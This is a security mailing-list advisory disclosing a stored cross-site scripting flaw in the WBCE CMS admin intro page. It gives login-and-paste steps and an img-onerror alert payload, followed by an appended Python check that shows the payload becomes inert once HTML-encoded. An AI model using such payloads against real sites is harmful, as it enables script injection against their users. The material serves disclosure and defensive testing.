
List:       full-disclosure
Subject:    [FD] WBCE - Stored XSS
From:       Andrey Stoykov <mwebsec () gmail ! com>
Date:       2023-07-14 11:57:35
Message-ID: CAF2Wu1bE6NeQp3N+hH7yNY5Gtq_P6QYCOs5L7A_x+tPOWHw2Tg () mail ! gmail ! com

# Exploit Title: WBCE - Stored XSS
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 1.6.1
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com


Steps to Exploit:

1. Login to application
2. Browse to following URI "http://host/wbce/admin/pages/intro.php"
3. Paste XSS payload "TEST"><img src=x onerror=alert(1)>"
4. Then browse to settings "Settings->General Settings->Enable Intro Page->Enabled"
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
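
An added example, not part of the original post and not WBCE code: a regression check that a fix for this report could be tested against, showing that the string from step 3 creates an element with an event handler when stored text is rendered unencoded, and stays inert data once HTML-encoded. `TEMPLATE`, `render` and `scan` are hypothetical names, and the template assumes the value lands in a quoted attribute (as the leading `">` of the string suggests); the advisory does not show WBCE's real markup.

```python
import html
from html.parser import HTMLParser

# String quoted in step 3 of the advisory.
PAYLOAD = 'TEST"><img src=x onerror=alert(1)>'

# Constructed markup (assumption): the stored value is echoed into a
# quoted attribute. This is not WBCE's actual template.
TEMPLATE = '<input type="text" name="intro" value="{value}">'


class ActiveContentFinder(HTMLParser):
    """Records (tag, attribute) pairs that can execute script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append((tag, None))
        for name, value in attrs:
            if name.startswith("on"):
                # Inline event handlers such as onerror/onload.
                self.findings.append((tag, name))
            elif name in ("href", "src"):
                if (value or "").strip().lower().startswith("javascript:"):
                    self.findings.append((tag, name))


def render(value, encode):
    """Place a stored value into the template, with or without encoding."""
    if encode:
        value = html.escape(value, quote=True)  # encodes & < > " '
    return TEMPLATE.format(value=value)


def scan(markup):
    """Return the script-capable tags/attributes a parser sees in markup."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("unencoded:", scan(render(PAYLOAD, encode=False)))
    print("encoded:  ", scan(render(PAYLOAD, encode=True)))
```
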